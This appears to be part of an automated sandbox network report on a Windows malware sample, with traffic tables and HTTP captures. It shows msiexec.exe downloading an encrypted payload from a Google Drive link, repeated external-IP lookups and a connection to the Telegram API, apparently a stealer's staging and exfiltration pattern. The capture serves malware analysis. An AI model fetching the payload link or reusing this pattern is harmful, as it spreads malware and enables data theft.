Oct 21, 2024 11:04:19.797532082 CEST	80	62525	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:20.837758064 CEST	80	62525	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:20.838015079 CEST	80	62525	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:20.838063002 CEST	62525	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:20.838846922 CEST	62526	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:20.838888884 CEST	443	62526	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:20.838952065 CEST	62526	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:20.839251995 CEST	62526	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:20.839271069 CEST	443	62526	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:21.465409994 CEST	443	62526	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:21.466903925 CEST	62526	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:21.466934919 CEST	443	62526	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:21.608923912 CEST	443	62526	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:21.609024048 CEST	443	62526	188.114.97.3	192.168.2.4
Oct 21, 2024 11:04:21.609167099 CEST	62526	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:21.609308004 CEST	62526	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:04:21.631293058 CEST	62525	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:21.637605906 CEST	80	62525	158.101.44.242	192.168.2.4
Oct 21, 2024 11:04:21.637672901 CEST	62525	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:04:21.640795946 CEST	62527	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:04:21.640832901 CEST	443	62527	149.154.167.220	192.168.2.4
Oct 21, 2024 11:04:21.640892982 CEST	62527	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:04:21.641215086 CEST	62527	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:04:21.641225100 CEST	443	62527	149.154.167.220	192.168.2.4
Oct 21, 2024 11:04:22.477734089 CEST	443	62527	149.154.167.220	192.168.2.4
Oct 21, 2024 11:04:22.477798939 CEST	62527	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:04:22.479965925 CEST	62527	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:04:22.479978085 CEST	443	62527	149.154.167.220	192.168.2.4
Oct 21, 2024 11:04:22.480178118 CEST	443	62527	149.154.167.220	192.168.2.4
Oct 21, 2024 11:04:22.481313944 CEST	62527	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:04:22.527415991 CEST	443	62527	149.154.167.220	192.168.2.4
Oct 21, 2024 11:04:22.720374107 CEST	443	62527	149.154.167.220	192.168.2.4
Oct 21, 2024 11:04:22.720439911 CEST	443	62527	149.154.167.220	192.168.2.4
Oct 21, 2024 11:04:22.720634937 CEST	62527	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:04:22.722404003 CEST	62527	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:04:29.072984934 CEST	62513	80	192.168.2.4	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 21, 2024 11:04:00.510355949 CEST	53	57166	1.1.1.1	192.168.2.4
Oct 21, 2024 11:04:02.057693958 CEST	62540	53	192.168.2.4	1.1.1.1
Oct 21, 2024 11:04:02.064623117 CEST	53	62540	1.1.1.1	192.168.2.4
Oct 21, 2024 11:04:03.633045912 CEST	60468	53	192.168.2.4	1.1.1.1
Oct 21, 2024 11:04:03.640368938 CEST	53	60468	1.1.1.1	192.168.2.4
Oct 21, 2024 11:04:08.191706896 CEST	57824	53	192.168.2.4	1.1.1.1
Oct 21, 2024 11:04:08.199623108 CEST	53	57824	1.1.1.1	192.168.2.4
Oct 21, 2024 11:04:09.377654076 CEST	52458	53	192.168.2.4	1.1.1.1
Oct 21, 2024 11:04:09.385179043 CEST	53	52458	1.1.1.1	192.168.2.4
Oct 21, 2024 11:04:21.631869078 CEST	61830	53	192.168.2.4	1.1.1.1
Oct 21, 2024 11:04:21.640366077 CEST	53	61830	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 21, 2024 11:04:02.057693958 CEST	192.168.2.4	1.1.1.1	0x7b1c	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:04:03.633045912 CEST	192.168.2.4	1.1.1.1	0x7264	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:04:08.191706896 CEST	192.168.2.4	1.1.1.1	0x35c9	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:04:09.377654076 CEST	192.168.2.4	1.1.1.1	0x11da	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:04:21.631869078 CEST	192.168.2.4	1.1.1.1	0x5aee	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 21, 2024 11:04:02.064623117 CEST	1.1.1.1	192.168.2.4	0x7b1c	No error (0)	drive.google.com		142.250.185.206	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:04:03.640368938 CEST	1.1.1.1	192.168.2.4	0x7264	No error (0)	drive.usercontent.google.com		216.58.206.33	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:04:08.199623108 CEST	1.1.1.1	192.168.2.4	0x35c9	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 21, 2024 11:04:08.199623108 CEST	1.1.1.1	192.168.2.4	0x35c9	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:04:08.199623108 CEST	1.1.1.1	192.168.2.4	0x35c9	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:04:08.199623108 CEST	1.1.1.1	192.168.2.4	0x35c9	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:04:08.199623108 CEST	1.1.1.1	192.168.2.4	0x35c9	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:04:08.199623108 CEST	1.1.1.1	192.168.2.4	0x35c9	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:04:09.385179043 CEST	1.1.1.1	192.168.2.4	0x11da	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:04:09.385179043 CEST	1.1.1.1	192.168.2.4	0x11da	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:04:21.640366077 CEST	1.1.1.1	192.168.2.4	0x5aee	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	62510	158.101.44.242	80	7808	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:04:08.209033012 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 21, 2024 11:04:08.885462999 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:04:08 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3fa3d4b546c27a9d1fdc3990e1ca225b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>
Oct 21, 2024 11:04:08.888746977 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 21, 2024 11:04:09.039673090 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:04:08 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2682f45d59653cdf473e87186bc93a2b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>
Oct 21, 2024 11:04:10.164840937 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 21, 2024 11:04:10.315489054 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:04:10 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a0d0a056d013a2afda1e65e5870afd7a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	62513	158.101.44.242	80	7808	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:04:11.072485924 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 21, 2024 11:04:11.715086937 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:04:11 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a3dda45343b8ec91f2d9ab7b48ac467b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	62515	158.101.44.242	80	7808	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:04:12.482969046 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 21, 2024 11:04:13.137375116 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:04:13 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 06fe7d7feae51a93bf52e41fc3a05da0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	62517	158.101.44.242	80	7808	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:04:13.903266907 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 21, 2024 11:04:14.552258968 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:04:14 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8cb383614382f4d7c945845f171f27a7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	62519	158.101.44.242	80	7808	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:04:15.323848009 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 21, 2024 11:04:15.967912912 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:04:15 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8b54369603e426d006772063a29b97ad Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	62521	158.101.44.242	80	7808	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:04:16.753762960 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 21, 2024 11:04:17.403842926 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:04:17 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 732cab14cd3b02afa096b88549275943 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	62523	158.101.44.242	80	7808	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:04:18.204130888 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 21, 2024 11:04:18.845242023 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:04:18 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 645524543128b2bc06b83ef5f69298e8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	62525	158.101.44.242	80	7808	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:04:19.792762995 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 21, 2024 11:04:20.837758064 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:04:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0e95bb082c142a0cb8042ebe50f2b425 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>
Oct 21, 2024 11:04:20.838015079 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:04:20 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0e95bb082c142a0cb8042ebe50f2b425 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	62508	142.250.185.206	443	7808	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:04:03 UTC	216	OUT	GET /uc?export=download&id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-10-21 09:04:03 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 21 Oct 2024 09:04:03 GMT Location: https://drive.usercontent.google.com/download?id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-e_fapOL391C56i0VHYopHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	62509	216.58.206.33	443	7808	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:04:04 UTC	258	OUT	GET /download?id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-10-21 09:04:07 UTC	4897	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="GedMSrTYyMf22.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 275008 Last-Modified: Sun, 20 Oct 2024 22:55:43 GMT X-GUploader-UploadID: AHmUCY2CcbluqA1bG5XUh7i67YDPc_jxa4r5dkAWl-HdeMPvVZC3Iy-rLu36-nWEF6qPapEm6_aw1GqBtw Date: Mon, 21 Oct 2024 09:04:07 GMT Expires: Mon, 21 Oct 2024 09:04:07 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=5Yambg== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-21 09:04:07 UTC	4897	IN	Data Raw: 65 8e c9 0b dd 61 87 d2 ba 07 db 81 0b 18 a5 c9 79 f9 70 4c f5 1f 98 2c d1 6c f1 50 58 b9 93 9b d9 51 9d b1 42 dc d0 47 a6 57 2b ee 1c 53 0e 6a be 5c 12 bb 39 57 40 ed 28 22 b4 7e 68 bf 1a ea c3 71 03 be bd 9c 00 6f 2d 63 61 1c 6d 0a 4f 29 f3 b2 a5 e3 a0 a0 68 58 c7 5d b5 d4 e5 c0 ac 6e 21 5b 3d c4 0a 2d a9 22 61 a7 b0 06 b8 4d 1d 51 33 12 a7 44 99 c4 a7 08 3e 34 47 7b 1e f5 83 3c f8 f5 c9 80 5d 31 8a 5c 96 06 39 81 b7 91 45 e2 ab 3d c2 9d 0e 87 bb 8a d5 a0 cc 7e dd 4a a2 8e 6d 61 aa 84 d3 4a 54 23 15 22 b6 6f e0 0f f3 91 b6 d1 fa 62 fd e6 d3 ee a9 d6 be 01 14 57 28 b0 07 d7 e4 1d 49 0b ba 67 5c 60 87 11 bf ce b6 e8 86 e8 c2 db 5c 2c a8 39 34 42 58 60 72 c7 a5 16 ad 71 92 79 92 b7 34 82 ce e0 e1 80 5f 01 8c 5a d5 94 b5 9e 10 6a 2e dc 8c 4f ae 7b 64 06 59 Data Ascii: eaypL,lPXQBGW+Sj\9W@("~hqo-camO)hX]n![=-"aMQ3D>4G{<]1\9E=~JmaJT#"obW(Ig\`\,94BX`rqy4_Zj.O{dY
2024-10-21 09:04:07 UTC	4897	IN	Data Raw: 50 ce 80 a7 37 a6 4e 5e fc 5c 86 68 6a fc 4a 42 7e a8 45 61 e6 cd 71 76 58 fa 1e c3 56 0f 64 0b 4a 10 88 9a 98 bf a7 98 fa 12 34 b5 c4 e8 dd ae 4e bf a3 e0 d8 d2 27 58 70 b4 19 89 d2 8f 82 7d f8 cc a3 e5 dd 20 9b a7 7a 76 e6 ff 86 25 78 de b4 da ee a8 2d 67 26 dc 30 5f eb eb 7e 07 38 11 9b a3 82 93 33 9c 7d 91 31 0e 5c 38 50 c8 44 45 3a e1 cb 30 6a c3 77 10 e7 ec cb 90 63 35 57 c8 f1 26 0d 46 7b 14 b3 86 37 7b 66 13 55 f0 10 d6 7e 10 6b fb 26 b6 4c 9b 63 32 06 f9 78 f8 7b ec 8e 90 3f 17 11 13 42 b9 d6 72 f0 ea 51 88 55 85 5e a0 34 d5 fe fd b9 69 66 01 50 a0 ad 01 f5 c9 c9 e5 59 d0 91 5e 71 64 3f 8f d4 0b c3 86 62 be 20 9c 89 8c c1 42 ef 1d 5c 38 50 82 80 4c af 73 84 c4 c8 c2 c8 e8 73 3a 36 f3 e3 57 96 28 14 71 f3 58 6e 01 d6 88 3c 33 d8 d6 af 4e 95 b1 49 Data Ascii: P7N^\hjJB~EaqvXVdJ4N'Xp} zv%x-g&0_~83}1\8PDE:0jwc5W&F{7{fU~k&Lc2x{?BrQU^4ifPY^qd?b B\8PLss:6W(qXn<3NI
2024-10-21 09:04:07 UTC	3	IN	Data Raw: cd f6 5e Data Ascii: ^
